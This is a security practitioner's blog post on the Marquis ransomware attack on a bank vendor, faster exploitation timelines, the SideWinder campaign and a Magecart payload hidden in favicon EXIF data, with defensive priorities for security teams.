The Marquis Attack Shows Why Third-Party Risk Just Got Real

Page content

The Marquis Attack Shows Why Third-Party Risk Just Got Real

You know that conversation we’ve been having for years about third-party risk? Well, it just got a lot less theoretical. The Marquis ransomware attack that hit back in August 2025 is finally getting the attention it deserves – and the numbers are staggering.

We’re talking about 672,000 people’s data stolen and operations disrupted at 74 banks across the United States. Let that sink in for a moment. One financial services provider gets compromised, and suddenly three-quarters of a hundred banks are dealing with operational issues. This isn’t just a breach; it’s a perfect case study in how interconnected our financial infrastructure really is.

When Your Vendor Becomes Your Biggest Risk

What makes the Marquis incident particularly sobering is how it demonstrates the ripple effect of modern business relationships. Most of those 74 banks probably had solid security programs, regular penetration tests, and all the compliance checkboxes ticked. But none of that mattered when their third-party provider became the entry point.

This connects directly to what security professionals are discussing at events like today’s Supply Chain & Third-Party Risk Summit. The reality is that cyber risk doesn’t respect organizational boundaries, and we’re seeing this play out in real-time consequences.

I’ve been in enough vendor risk assessments to know how this usually goes. We send out questionnaires, maybe do a quick review of their SOC 2 report, and call it good. But are we really understanding the blast radius if that vendor gets compromised? The Marquis attack suggests we’re not asking the right questions.

The Speed Problem Gets Worse

Speaking of things getting worse, let’s talk about something that should keep us all up at night. Rapid7’s latest research shows that the median time from vulnerability publication to CISA KEV inclusion has dropped to just five days. Five days.

This isn’t just about faster discovery – it’s about AI-enabled adversaries compressing the entire attack lifecycle. While we’re still running our monthly patch cycles and waiting for change approval boards, attackers are already weaponizing vulnerabilities before most of us have even read the CVE description.

I remember when we used to talk about having a 30-day window to patch critical vulnerabilities. Those days are gone. The new reality is that if you’re not patching within days of disclosure, you’re essentially running unprotected systems in a hostile environment.

State-Level Persistence Gets Sneakier

The SideWinder campaign expanding across Southeast Asia shows us another concerning trend. This suspected India-linked group isn’t just hitting random targets – they’re systematically going after governments, telecom providers, and critical infrastructure using a combination of spear-phishing and old vulnerabilities.

What’s particularly clever about their approach is the rapidly rotating infrastructure. Just when you think you’ve got their indicators of compromise figured out, they’ve moved to new domains and IP addresses. It’s like playing whack-a-mole with an opponent who keeps changing the rules.

The persistence aspect is what really gets me. These aren’t smash-and-grab operations; they’re establishing long-term access to critical systems. For those of us defending infrastructure in the region, this represents a fundamental shift in how we need to think about threat modeling.

The Blind Spots in Our New Tools

Here’s something that caught my attention in the Claude Code Security analysis: even our shiny new AI-powered security tools have significant blind spots. The example they give is perfect – a Magecart payload hiding in the EXIF data of a dynamically loaded favicon. Your repository scanner will never catch this because the malicious code never actually touches your repo.

This is the technical boundary where static analysis stops and runtime execution begins. We’re getting better at scanning code, but we’re still struggling with dynamic, client-side threats that assemble themselves at runtime. It’s a reminder that no single tool or approach is going to solve our security challenges.

What This Means for Our Day-to-Day Work

Looking at these stories together, I see three immediate priorities for our security programs. First, we need to completely rethink how we assess and monitor third-party risk. The Marquis attack shows that a vendor’s compromise can become our operational crisis overnight.

Second, our patch management processes need to match the new reality of AI-accelerated exploitation. If we’re not prepared to patch critical vulnerabilities within days, not weeks, we’re accepting unnecessary risk.

Finally, we need to acknowledge that our detection and response capabilities have to account for both state-level persistence campaigns and dynamic client-side attacks that assemble themselves at runtime. Our traditional perimeter-focused thinking isn’t cutting it anymore.

The common thread through all of these stories is that the threat environment is becoming more sophisticated while our attack surface keeps expanding. But that doesn’t mean we’re helpless – it means we need to be more strategic about where we focus our limited resources and attention.

Sources